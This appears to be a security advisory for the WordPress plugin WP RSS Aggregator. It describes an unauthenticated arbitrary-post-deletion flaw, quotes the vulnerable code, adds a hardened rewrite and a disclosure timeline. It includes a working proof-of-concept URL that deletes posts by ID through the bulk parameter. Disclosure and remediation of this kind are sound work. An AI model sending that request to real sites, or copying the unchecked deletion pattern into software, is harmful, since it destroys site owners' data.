feed-blacklist.php is loaded on every request, i.e. whenever any page of the site is displayed, not only in the admin area.
File: wp-rss-aggregator\wp-rss-aggregator.php
    /* Load the blacklist functions file */
    require_once ( WPRSS_INC . 'feed-blacklist.php' );
wprss_check_if_blacklist_delete() is hooked to the init action, so it also runs on every request.
File: wp-rss-aggregator\includes\feed-blacklist.php
    // Check if deleting a blacklist item, from the GET parameter
    add_action( 'init', 'wprss_check_if_blacklist_delete' );
Administrator privileges are NOT checked anywhere in the function, and the nonce check is skipped entirely when $_GET['wprss-bulk'] is passed: check_admin_referer() sits only in the single-entry branch, so a bulk request from an unauthenticated visitor reaches wp_delete_post() without any verification.
File: wp-rss-aggregator\includes\feed-blacklist.php
    function wprss_check_if_blacklist_delete() {
        // If the GET param is not set, do nothing. Return.
        if ( empty( $_GET['wprss-blacklist-remove'] ) ) return;
        // The array of blacklist entries to delete
        $to_delete = array();
        // The ID of the blacklist entry - if only deleting a single entry
        $ID = $_GET['wprss-blacklist-remove'];
        // check if deleting in bulk
        if ( isset( $_GET['wprss-bulk'] ) && $_GET['wprss-bulk'] == '1' ) {
            $to_delete = explode( ',', $ID );
        } else {
            $to_delete = array( $ID );
            // Get the ID from the GET param
            // Verify the nonce
            check_admin_referer( 'blacklist-remove-' . $ID, 'wprss_blacklist_trash' );
        }
        // Delete the posts marked for delete
        foreach( $to_delete as $delete_id ) {
            wp_delete_post( $delete_id, TRUE );
        }
        // Redirect back to blacklists page
        $paged = isset( $_GET['paged'] )? '&paged=' . $_GET['paged'] : '';
        header('Location: ' . admin_url('edit.php?post_type=wprss_blacklist' . $paged ) );
        exit;
    }
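A hardened version of the function above, added here as an illustration; it is not the plugin's own code and not the 4.6.4 fix, whose contents this advisory does not show. It assumes the blacklist post type is wprss_blacklist (taken from the redirect URL), that delete_posts is the required capability, and that the bulk link is generated with a hypothetical blacklist-remove-bulk nonce action; it would be hooked to init exactly like the original.

```php
<?php
// Hardened rewrite of wprss_check_if_blacklist_delete(). Added illustration,
// NOT the vendor's 4.6.4 fix. Assumptions: the blacklist post type is
// 'wprss_blacklist' (taken from the redirect URL), 'delete_posts' is the
// required capability, and the bulk link is built with the nonce action
// 'blacklist-remove-bulk' (hypothetical name).
function wprss_check_if_blacklist_delete_hardened() {
    if ( empty( $_GET['wprss-blacklist-remove'] ) ) {
        return;
    }

    // 1. Authorization: the original never asked who the caller was.
    if ( ! is_user_logged_in() || ! current_user_can( 'delete_posts' ) ) {
        wp_die( 'Not allowed.', '', array( 'response' => 403 ) );
    }

    $raw     = wp_unslash( $_GET['wprss-blacklist-remove'] );
    $is_bulk = isset( $_GET['wprss-bulk'] ) && '1' === $_GET['wprss-bulk'];

    // 2. CSRF: verify a nonce on BOTH paths. The original only did so in the
    //    single-entry branch, so '&wprss-bulk=1' skipped it entirely.
    $action = $is_bulk ? 'blacklist-remove-bulk' : 'blacklist-remove-' . $raw;
    check_admin_referer( $action, 'wprss_blacklist_trash' );

    // 3. Input validation: accept only positive integers as post IDs.
    $ids = $is_bulk ? explode( ',', $raw ) : array( $raw );
    $ids = array_filter( array_map( 'absint', $ids ) );

    foreach ( $ids as $id ) {
        // 4. Object-level checks: only blacklist entries, and only ones this
        //    user may delete. The original would delete ANY post by ID.
        if ( 'wprss_blacklist' !== get_post_type( $id ) ) {
            continue;
        }
        if ( ! current_user_can( 'delete_post', $id ) ) {
            continue;
        }
        wp_delete_post( $id, true );
    }

    $paged = isset( $_GET['paged'] ) ? '&paged=' . absint( $_GET['paged'] ) : '';
    wp_safe_redirect( admin_url( 'edit.php?post_type=wprss_blacklist' . $paged ) );
    exit;
}
```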
Proof of Concept

Anyone can delete any posts: wp_delete_post() is called with whatever IDs are supplied, with no check on the post type or on the caller. For example, to delete the posts with ID=1 and ID=2:

    http://wordpress-install/?wprss-blacklist-remove=1,2&wprss-bulk=1
Timeline
- 08-11-2014: Discovered
- 08-11-2014: Vendor notified
- 10-11-2014: Version 4.6.4 released, issue resolved